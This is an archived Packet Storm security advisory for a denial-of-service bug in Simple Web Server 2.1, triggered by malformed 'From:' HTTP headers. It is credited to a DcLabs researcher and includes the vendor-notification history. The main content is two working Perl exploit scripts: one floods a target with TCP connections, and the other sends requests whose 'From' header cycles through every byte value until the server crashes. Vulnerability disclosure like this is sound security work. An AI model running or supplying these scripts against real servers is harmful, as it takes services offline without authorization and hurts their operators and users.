Simple Web Server 2.1 Denial Of Service

2010-08-03T00:00:00
ID PACKETSTORM:92445
Type packetstorm
Reporter ipax
Modified 2010-08-03T00:00:00

Description

                                        
                                            `[DCA-0003]  
  
[Software]  
  
- Simple Web Server  
  
[Vendor Product Description]  
  
- The easy and small way to open an HTTP Web Server. OS  
Versions:Windows9x/Me/NT/2000/XP  
  
[Bug Description]  
  
- SwS can't handle the header 'From:' when using random ASCII  
characters leading to Denial-of-Service.  
  
[History]  
  
- Advisory sent to vendor on 06/14/2010.  
- No response from vendor  
- Public advisory & exploit 08/02/2010.  
  
[Impact]  
  
- Low  
  
[Affected Version]  
  
- Simple Web Server SwS v2.1  
- Prior versions may also be vulnerable  
  
[Code]  
  
#!/usr/bin/perl  
use IO::Socket;  
  
  
$ip = $ARGV[0];  
$port = $ARGV[1];  
$conn = $ARGV[2];  
  
$num = 0;  
  
  
while ( $num <= $conn ) {  
system("echo -n .");  
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
  
close($s);  
$num++;  
}  
  
  
#!/usr/bin/perl  
use Net::HTTP;  
  
if (@ARGV < 1) {  
usage();  
}  
  
  
$host = @ARGV[0];  
$port = @ARGV[1];  
$num = 0;  
  
print "[+] Sending request...\n";  
  
  
while ($num <= 255) {  
my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@;  
$s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0",  
'From' => chr($num));  
  
$num++;  
close($s);  
}  
  
print "\n[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port>\n";  
print "[-] Example: ". $0 ." 127.0.0.1 80\n";  
exit;  
}  
  
  
  
[Credits]  
  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
  
  
[Greetz]  
Crash and all Dclabs members.  
  
--   
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`